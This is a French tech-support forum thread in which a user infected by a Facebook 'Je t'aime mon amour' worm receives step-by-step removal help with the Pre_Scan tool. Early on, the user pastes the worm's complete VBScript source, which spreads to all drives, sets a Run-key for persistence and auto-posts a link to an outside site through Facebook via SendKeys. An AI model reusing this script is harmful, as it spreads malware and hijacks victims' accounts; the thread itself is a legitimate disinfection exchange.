Virus sur facebook "Je t'aime mon amour"

Floflo -  
 Utilisateur anonyme -
Bonjour,

J'ai cliqué sur un lien facebook "je t'aime mon amour" qu'un ami a posté sur son mur, et j'ai bêtement ouvert et téléchargé le fichier qui était sous format .zip . Et depuis toute les 20 minutes ça publie sur mon mur "Je t'aime mon amour <3" avec le lien zip. Et je ne peux rien faire, ça ouvre une page firefox et ça publie avec mon nom.
Comment faire pour arrêter ce virus ?

PS: Quelqu'un est dans la même situation que moi ici : http://www.commentcamarche.net/forum/affich-26290012-virus-je-t-aime-mon-amour-sur-facebook mais on m'a conseillé de reposer la question.

Merci d'avance, bonne journée.
A voir également:

33 réponses

Floflo
 
Avec j'ai eu ça:
On error resume next '11/07/2012 by N@ks
Set C = CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName)
Set Nn1 = CreateObject("WScript.Shell")
Set Nn2 = CreateObject("Scripting.FileSystemObject")
Set Nn3 = Nn2.GetSpecialFolder(1)
Set Drives=Nn2.drives
Bm = Nn1.SpecialFolders("Startup")
Do
For Each Drive in Drives
If drive.isready then
Nn2.CopyFile ""&WScript.ScriptFullName&"" , ""&drive&"\Je_t'aime.vbs"
end If
Next
C.Copy(Nn3&"\Knucker.C.vbs")
If Nn2.FileExists(Nn3&"\Knucker.C.vbs") Then
Nn1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Pdll", ""&Nn3&"\Knucker.C.vbs"
Else
C.Copy(Bm&"\Wsserv.vbs")
End If
wscript.sleep 10000
Nn1.run "http://www.facebook.com/sharer.php?u=http://kamasms.fr/vi.html"
wscript.sleep 7000
Nn1.SendKeys ("{tab}")
Nn1.SendKeys ("{tab}")
Nn1.SendKeys ("{tab}")
Nn1.SendKeys ("Je t'aime mon amoooouuuurrr <3<3<3 :) !")
wscript.sleep 121
Nn1.SendKeys ("{tab}")
Nn1.SendKeys ("{enter}")
wscript.sleep 121
Nn1.SendKeys ("^{F4}")
wscript.sleep 1000*60*15
Loop
0
Utilisateur anonyme
 
tu fais quoi avec le pc pendant la desinfefction ? du streaming ? tu installes n importe quoi ?
0
Floflo
 
Lorsqu'on me dit qu'il faut fermer toute les applis je les fermes. Sinon j'ai facebook/you tube et un jeu par navigateur d'ouvert
0
Utilisateur anonyme
 
ben alors c est pas tout fermé !!!!

il est ou ce texte que tu viens de me montrer là ? dans c:\ ? supprime le quoi qu il en soit

il avait deja ete supprimé par pre_scan et il est revenu c est donc bien que tu fais des trucs avec ton pc !
0
Floflo
 
Il n'y a plus que ça dans c:\
http://gyazo.com/695e2625415a5fb8a414629463014970
S3 c'est le rapport de adw que je viens de faire
0
Utilisateur anonyme
 
suppprime je t'aime et END
0
Floflo
 
End est supprimé mais quand je veux supprimer je t'aime ça me met ça:
http://gyazo.com/24562ae808dadb8ca224c8e46874287e
Je t'aime est aussi ici: http://gyazo.com/ed07c027a1ec6e2c2fa1c7692c502e67
0
Utilisateur anonyme
 
tu peux le supprimer manuellement celui dans D:\ ?
0
Floflo
 
non ça me met le même message, mais ça doit bien faire 40 min que j'ai plus eu le truc facebook
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Utilisateur anonyme
 
selectionne ce texte :

File|Fold::
C:\Je_t'aime.vbs
D:\je_t'aime.vbs


Relance Pre_scan puis choisis l'option "Script"

une page va s'ouvrir

logiquement le texte que tu as sélectionné s'y trouve déjà , donc tu fermes et le programme va travailler.

sinon colle-le (clic droit/coller ou ctrl+V) dans la page vierge.

puis onglet fichier => enregistrer (pas enregistrer sous...) , puis ferme le texte

des fenetres noires risquent de clignoter , c'est normal , c'est le programme qui travaille

poste Pre_Script.txt qui apparaitra sur le bureau en fin de travail

¤¤¤¤¤¤¤¤¤¤ Pre_Scan_Concept ¤¤¤¤¤¤¤¤¤¤
0
Floflo
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Pre_Script | 2.1021 ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

Florian : Windows 7 Home Premium (64 bits)

Switchs : http://gen-hackman.forum-pro.fr/t89-les-switchs

New restorepoint created

Script : 22:29:42

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

File Quarantined and Deleted Successfully : |A| - C:\Je_t'aime.vbs
File Quarantined and Deleted Successfully : |A| - D:\je_t'aime.vbs

Fin : 22:29:43

¤¤¤¤¤¤¤¤¤¤ ( EOF ) ¤¤¤¤¤¤¤¤¤¤
0
Floflo
 
Je confirme que "je t'aime" n'est plus dans C: et D:
0
Utilisateur anonyme
 
ok redemarre le pc et vois s ils sont revenus
0
Floflo
 
Ils ne sont pas revenus
0
Utilisateur anonyme
 
bien refais un diag avec pre_scan
0
Floflo
 
Je vais me coucher, je ferai ça demain.
En tout cas vraiment merci pour toute l'aide que tu m'as apporté !
0
Floflo
 
Salut !
Voilà le diag https://forums-fec.be/upload/www/?a=d&i=8631732996
0
Utilisateur anonyme
 
desinstalle adobe reader 9

t'es retourné sur facebook entre temps ?
0
Floflo
 
pendant le diag non mais sinon oui, pas de publication du script
0
Floflo
 
adobe reader est désinstallé
0
Utilisateur anonyme
 
relance pre_scan clique sur regedit

deplie avec les petits "+"

HKEY_LOCAL_MACHINE
\Software
\Microsoft
\Software

clic droit sur celui en gras et choisis exporter => du nom que tu veux , sur le bureau

ferme le registre

ensuite clique droit sur la clé ainsi créée puis selectionne "modifier"

colle le contenu ici

ensuite tu peux la fermer ( la clé ^^ ) et la supprimer

===========================

desinstalle tout Java

============================

Attention !!! pense à re-désactiver tes protections

Clique sur ce lien : https://www.cjoint.com/?BJwvH4QYosS

Selectionne tout le texte qui s'y trouve CTRL+A puis CTRL+C ou clic droit/copier

Relance Pre_scan puis choisis l'option "Script"

une page va s'ouvrir

logiquement le texte que tu as sélectionné s'y trouve déjà , donc tu fermes et le programme va travailler.

sinon colle-le (clic droit/coller ou ctrl+V) dans la page vierge.

puis onglet fichier => enregistrer (pas enregistrer sous...) , puis ferme le texte

des fenetres noires risquent de clignoter , c'est normal , c'est le programme qui travaille

poste Pre_Script.txt qui apparaitra sur le bureau en fin de travail
0